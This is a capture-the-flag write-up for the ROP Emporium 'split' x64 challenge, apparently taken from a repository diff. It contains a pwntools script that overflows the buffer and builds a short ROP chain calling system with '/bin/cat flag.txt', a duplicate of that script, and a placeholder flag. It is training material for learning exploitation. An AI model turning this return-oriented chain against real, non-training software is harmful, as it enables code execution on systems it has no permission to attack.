split64 challenge

Author: cynops

Rop-Emporium/split/Images/1.png

@@ -0,0 +1,43 @@
+# split
+
+> In this challenge the elements that allowed you to complete the ret2win challenge are still present, they've just been split apart. Find them and recombine them using a short ROP chain.
+> Click below to download the binary.
+>
+> Url: https://ropemporium.com/challenge/split.html
+
+
+
+### x64 Solution
+
+Our mission is to do a ROP chain to call system function with "/bin/bat flag.txt" as an argument to get the flag.
+
+![](Images/1.png)
+
+```bash
+~$ ropper -f split64 > split-gadgets.txt
+```
+
+![](Images/3.png)
+
+
+
+```python
+from pwn import *
+
+elf = ELF('./split64')
+
+io=process(elf.path)
+payload=flat(
+'A'*40,
+ 0x400883, # 0x400883: pop rdi; ret;
+ elf.search('/bin/cat flag.txt').next(),
+elf.sym['system'],
+endianness='little', word_size=64, sign=False)
+
+io.recvuntil('> ')
+io.sendline(payload)
+io.interactive()
+```
+
+![](Images/2.png)
+

Rop-Emporium/split/Images/2.png

@@ -0,0 +1,19 @@
+from pwn import *
+
+
+elf = ELF('./split64')
+
+context.terminal=['tmux','sp','-h']
+#context.log_level='DEBUG'
+
+io=process(elf.path)
+payload= flat(
+'A'*40 ,
+0x400883, #0x0000000000400883: pop rdi; ret;
+elf.search('/bin/cat flag.txt').next(), #0x00601060 17 18 (.data) ascii /bin/cat flag.txt
+elf.sym['system'],
+endianness='little',word_size=64,sign=False)
+
+io.recvuntil('> ')
+io.sendline(payload)
+io.interactive()

Rop-Emporium/split/Images/3.png

@@ -0,0 +1 @@
+ROPE{a_placeholder_32byte_flag!}